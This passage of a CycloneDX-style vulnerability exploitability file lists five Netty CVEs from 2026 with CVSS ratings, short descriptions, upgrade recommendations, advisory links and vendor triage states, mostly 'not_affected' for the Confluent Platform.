      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-59899",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        770
      ],
      "description": "Netty is an asynchronous, event-driven network application framework. Prior to versions 4.1.136.Final and 4.2.16.Final, `HttpContentEncoder` (the superclass of the production handler `HttpContentCompressor`) maintains a per-channel `ArrayDeque<CharSequence>` named `acceptEncodingQueue` that accumulates attacker-controlled data without any size limit. The queue is filled on the I/O thread for every inbound HTTP request and drained only when the application later writes a non-1xx response. This creates a resource exhaustion vulnerability when an attacker exploits HTTP/1.1 pipelining to flood the connection with requests faster than the application produces responses. This issue has been fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-http to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59899"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59899"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-q4f6-jm68-57ww"
        },
        {
          "url": "https://netty.io/news/2026/07/09/4-1-136-Final.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59899"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59899"
        }
      ],
      "published": "2026-07-29T18:16:56+00:00",
      "updated": "2026-08-06T20:25:31+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:50fb2294-f11b-414d-a002-8a150d5f35e2/1#59482894-99d8-4e97-9ad6-82555a5a8f66"
        },
        {
          "ref": "urn:cdx:36048e5d-22a1-48a8-8b91-d48b353ddac7/1#e9270d8f-ac37-46a9-ba4d-bccbb3434099"
        },
        {
          "ref": "urn:cdx:7d56b569-5272-47f2-a33d-d86bd677f6c9/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ea5ed770-fbdf-4f09-96ee-b278412c62d3/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0a2a2284-e186-40c4-84a6-9946617cb8d0/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:31443ff6-1226-453d-ad8c-b0b839b16266/1#efded87b-2e1f-45f1-b20f-daf47fabfdd6"
        },
        {
          "ref": "urn:cdx:5a41366f-81c7-467f-a944-b70c66237100/1#d664916f-0188-4c6d-976a-a95e5b004984"
        },
        {
          "ref": "urn:cdx:e7f0e99d-6e24-448f-8ce9-0d3e2dfc36a2/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:fe1a73d2-1fae-4971-95ae-518949f1e0d6/1#b5155b1d-7e63-430d-9004-8520ee029169"
        },
        {
          "ref": "urn:cdx:926511d8-a5cf-4677-a808-9889fa46da3a/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#c755cc34-3f6d-447c-b113-46440a5e6657"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#b516514f-e0f6-44e9-b5f5-2db4c89a2fa9"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#ecd9c6d7-21be-4329-8bd2-64415b7c67e8"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#f50d8d8f-9f83-4d24-a8be-069154322809"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#fba45fa2-71ff-40da-bbb8-a08bd44cf523"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#bab7766f-9268-4e06-a706-63ef52378b94"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#ffd958be-72a4-4c81-b800-2b6b152841a3"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#f46bd9c5-bbb4-4905-a7e5-87b2cdfa4b07"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#df1f0e67-c2af-4b0a-bc27-0a1d04477689"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#fb09ca96-2de8-4848-83ef-0df6c1b392fe"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#e987c11d-07b4-49db-ab1c-0a2f02c125fe"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#72448050-828a-4fa4-af95-d1e062179c95"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#d612726f-976c-49db-8573-9ddb341ea8ba"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#8ce216c4-3956-4ece-9ac2-5db5191ada51"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#e89047a4-0a3b-4cfb-88c0-ceca6523232d"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-59900",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"
        }
      ],
      "cwes": [
        444
      ],
      "description": "Netty is an asynchronous, event-driven network application framework. Prior to versions 4.1.136.Final and 4.2.16.Final, Netty's HTTP/2-to-HTTP/1.x translation layer (`Http2StreamFrameToHttpObjectCodec` and `InboundHttp2ToHttpAdapter`) fails to deduplicate or validate `Host` headers when an HTTP/2 client supplies both the `:authority` pseudo-header and a literal `host` header in a single HEADERS frame. The translator maps `:authority` to `Host` and separately copies the literal `host` header, producing an `HttpRequest` object containing two `Host` headers with attacker-controlled differing values. This issue has been fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-http2 to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59900"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59900"
        },
        {
          "url": "https://github.com/advisories/GHSA-c69g-56f8-xwqj"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-c69g-56f8-xwqj"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59900"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59900"
        }
      ],
      "published": "2026-07-29T18:16:56+00:00",
      "updated": "2026-08-06T20:29:01+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http2@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http2@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:50fb2294-f11b-414d-a002-8a150d5f35e2/1#d6ee3ce2-4f0b-4a79-816e-3c2ba974a6e7"
        },
        {
          "ref": "urn:cdx:36048e5d-22a1-48a8-8b91-d48b353ddac7/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ea5ed770-fbdf-4f09-96ee-b278412c62d3/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0a2a2284-e186-40c4-84a6-9946617cb8d0/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:31443ff6-1226-453d-ad8c-b0b839b16266/1#d145c7e6-102f-4b06-92e8-ce40c2279dad"
        },
        {
          "ref": "urn:cdx:5a41366f-81c7-467f-a944-b70c66237100/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:fe1a73d2-1fae-4971-95ae-518949f1e0d6/1#f424fd8b-adc2-4ff6-b306-57017bcfa0bb"
        },
        {
          "ref": "urn:cdx:926511d8-a5cf-4677-a808-9889fa46da3a/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#f8b753be-1372-4d23-99f7-0f2a225876b4"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#db6a03e4-95b5-4f8a-a475-1e6d08d8d589"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#8bd091e5-5c32-4fbc-a33e-f0a529ff9a60"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#ec96c986-7272-439c-899a-e196daa54ee0"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#f58728ef-db0d-43cc-a819-79e1c5883be5"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#fe21e3cb-4246-4574-992d-d03aceb5018b"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#fff2eb02-281e-44f6-8f07-f49c9140866e"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#f7aecd34-d071-460d-9bcf-1de8c1851c0f"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#dab000ea-7079-4d8b-83c7-3897f00cd0b8"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#8caa2517-f9f2-4f7f-bf59-08e119e92862"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#f834f5cb-2cc3-4371-bd9c-6f3e295de2fa"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#aba3ff85-5f84-4c0a-83b2-ab23529d47a4"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-59901",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        835
      ],
      "description": "Netty is an asynchronous, event-driven network application framework. Prior to versions 4.1.136.Final and 4.2.16.Final, the `Bzip2Decoder` handler in Netty's compression codec pipeline is vulnerable to a denial-of-service attack through a malformed bzip2 stream that permanently captures the event-loop thread in an infinite loop. The vulnerability exists in the run-length encoding (RLE) state machine within [`Bzip2BlockDecompressor.read()`]. This issue has been fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec to version 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59901"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59901"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-558v-64gr-wgg4"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59901"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59901"
        }
      ],
      "published": "2026-07-29T18:16:56+00:00",
      "updated": "2026-08-06T20:29:27+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:50fb2294-f11b-414d-a002-8a150d5f35e2/1#dd8179b9-fc98-44b2-8236-5a3ccb213d1d"
        },
        {
          "ref": "urn:cdx:1839f13b-6a18-4e7b-b310-7da0ee6a32ad/1#pkg:maven/io.netty/netty-codec@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:36048e5d-22a1-48a8-8b91-d48b353ddac7/1#7a71c270-2186-4cfa-8add-31f30f4c47da"
        },
        {
          "ref": "urn:cdx:7d56b569-5272-47f2-a33d-d86bd677f6c9/1#pkg:maven/io.netty/netty-codec@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ea5ed770-fbdf-4f09-96ee-b278412c62d3/1#pkg:maven/io.netty/netty-codec@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0a2a2284-e186-40c4-84a6-9946617cb8d0/1#962426f8-c730-4674-af5f-427376e4989a"
        },
        {
          "ref": "urn:cdx:31443ff6-1226-453d-ad8c-b0b839b16266/1#f2a9b3d8-18db-4059-9eb1-43c91068c191"
        },
        {
          "ref": "urn:cdx:5a41366f-81c7-467f-a944-b70c66237100/1#fbb85297-ccef-46b7-b095-e0eb1cb3df19"
        },
        {
          "ref": "urn:cdx:e7f0e99d-6e24-448f-8ce9-0d3e2dfc36a2/1#pkg:maven/io.netty/netty-codec@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:fe1a73d2-1fae-4971-95ae-518949f1e0d6/1#dd1f1123-2552-4c72-b2b1-fffa33122d6d"
        },
        {
          "ref": "urn:cdx:926511d8-a5cf-4677-a808-9889fa46da3a/1#pkg:maven/io.netty/netty-codec@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#d40e202b-eccc-4760-970e-ead9eac57022"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#f24401c2-7846-4e7c-9efb-eed5eb949526"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#ea259259-8d44-459d-8f60-508cbbc77c6e"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#f4d1ef5a-e671-4011-89d6-2a9778833cce"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#f54a1b9b-ef72-48ce-a0f9-4ae1beb510d3"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#d2c857fc-8ed0-48d5-b843-66b67ff1af26"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#e023e63b-164f-4515-8cf8-44986a226f37"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#fedd1cb7-4986-4cfe-bef2-05a9b68fe902"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#ecbf29a8-ca0f-438d-b076-d5f496c20a56"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#f6e2c90e-c78b-43cc-abe1-7c0ce2a5bfab"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:maven/io.netty/netty-codec@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#e3582252-5d57-454b-a018-80dd175d30c0"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#90985e06-b48d-4259-8921-278e20021110"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#f94c335e-08a6-4a3e-8504-42c4100945e0"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#f3199594-84ea-478e-96f3-5a5272d2427e"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#f35a2b96-3d48-4324-8080-7ca4270a8711"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. Netty's Bzip2Decoder is not used in the Confluent Platform codebase."
      }
    },
    {
      "id": "CVE-2026-59902",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400
      ],
      "description": "Netty is an asynchronous, event-driven network application framework. Prior to 4.1.137.Final and 4.2.17.Final, io.netty.handler.codec.sctp.SctpMessageCompletionHandler limits incomplete messages and fragment counts but not maxBufferedBytes, allowing unauthenticated peers to exhaust memory with large SCTP fragments. This issue is fixed in versions 4.1.137.Final and 4.2.17.Final.",
      "recommendation": "Upgrade io.netty:netty-transport-sctp to version 4.2.17.Final, 4.1.137.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59902"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/commit/1b5abc6443b63726c72cdd285af2feb7ddbb8ff7"
        },
        {
          "url": "https://github.com/netty/netty/pull/17213"
        },
        {
          "url": "https://github.com/netty/netty/pull/17217"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.137.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.17.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-2qj4-mmr9-4v2f"
        }
      ],
      "published": "2026-08-17T18:17:36+00:00",
      "updated": "2026-08-18T15:16:55+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-transport-sctp@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-transport-sctp@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:50fb2294-f11b-414d-a002-8a150d5f35e2/1#52162bed-8a8d-4bd7-b1e7-0613e00c0977"
        },
        {
          "ref": "urn:cdx:ea5ed770-fbdf-4f09-96ee-b278412c62d3/1#pkg:maven/io.netty/netty-transport-sctp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:31443ff6-1226-453d-ad8c-b0b839b16266/1#ee3bf1cf-881a-4b64-8e6a-4ad902a592f0"
        },
        {
          "ref": "urn:cdx:5a41366f-81c7-467f-a944-b70c66237100/1#pkg:maven/io.netty/netty-transport-sctp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:926511d8-a5cf-4677-a808-9889fa46da3a/1#pkg:maven/io.netty/netty-transport-sctp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#8c551c5f-0e57-4d3c-8203-e2b5a48c9568"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#ed77dd3f-e7e2-4be3-b9d1-53e90736d7cb"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#ce5a8f09-23e2-4e9f-b9da-899393167b13"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#f42ffa31-6753-47e0-9d62-5639caf7bb95"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#f5f43295-dd4f-4f5c-8448-f48d2c77fefa"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#853b681c-a3eb-49c9-adca-cb664f7d3635"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#d41916d7-b7af-4a7c-9e3e-359d4663823b"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#d5ad79d2-0b0c-4c6a-a56c-dab55bb16ef9"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:maven/io.netty/netty-transport-sctp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:maven/io.netty/netty-transport-sctp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#fd382151-ca32-4363-9e05-b3c593ac28a4"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-59903",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N"
        }
      ],
      "cwes": [
        524
      ],
      "description": "Netty is an asynchronous, event-driven network application framework. Prior to 4.1.137.Final and 4.2.17.Final, io.netty.handler.codec.http.cors.CorsHandler setVaryHeader replaces application Vary headers such as Authorization or Cookie with Origin, allowing a caching proxy or CDN to reuse authenticated responses across users and disclose sensitive information. This issue is fixed in versions 4.1.137.Final and 4.2.17.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-http to version 4.2.17.Final, 4.1.137.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59903"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/pull/17213"
        },
        {
          "url": "https://github.com/netty/netty/pull/17217"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.137.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.17.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-8c42-7qj2-3j46"
        }
      ],
      "published": "2026-08-17T18:17:36+00:00",
      "updated": "2026-08-17T19:16:32+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:50fb2294-f11b-414d-a002-8a150d5f35e2/1#59482894-99d8-4e97-9ad6-82555a5a8f66"
        },
        {
          "ref": "urn:cdx:36048e5d-22a1-48a8-8b91-d48b353ddac7/1#e9270d8f-ac37-46a9-ba4d-bccbb3434099"
        },
        {
          "ref": "urn:cdx:7d56b569-5272-47f2-a33d-d86bd677f6c9/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ea5ed770-fbdf-4f09-96ee-b278412c62d3/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0a2a2284-e186-40c4-84a6-9946617cb8d0/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:31443ff6-1226-453d-ad8c-b0b839b16266/1#efded87b-2e1f-45f1-b20f-daf47fabfdd6"
        },
        {
          "ref": "urn:cdx:5a41366f-81c7-467f-a944-b70c66237100/1#d664916f-0188-4c6d-976a-a95e5b004984"
        },
        {
          "ref": "urn:cdx:e7f0e99d-6e24-448f-8ce9-0d3e2dfc36a2/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:fe1a73d2-1fae-4971-95ae-518949f1e0d6/1#b5155b1d-7e63-430d-9004-8520ee029169"
        },
        {
          "ref": "urn:cdx:926511d8-a5cf-4677-a808-9889fa46da3a/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#c755cc34-3f6d-447c-b113-46440a5e6657"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#b516514f-e0f6-44e9-b5f5-2db4c89a2fa9"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#ecd9c6d7-21be-4329-8bd2-64415b7c67e8"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#f50d8d8f-9f83-4d24-a8be-069154322809"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#fba45fa2-71ff-40da-bbb8-a08bd44cf523"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#bab7766f-9268-4e06-a706-63ef52378b94"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#ffd958be-72a4-4c81-b800-2b6b152841a3"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#f46bd9c5-bbb4-4905-a7e5-87b2cdfa4b07"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#df1f0e67-c2af-4b0a-bc27-0a1d04477689"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#fb09ca96-2de8-4848-83ef-0df6c1b392fe"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#e987c11d-07b4-49db-ab1c-0a2f02c125fe"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#72448050-828a-4fa4-af95-d1e062179c95"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#d612726f-976c-49db-8573-9ddb341ea8ba"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#8ce216c4-3956-4ece-9ac2-5db5191ada51"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#e89047a4-0a3b-4cfb-88c0-ceca6523232d"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
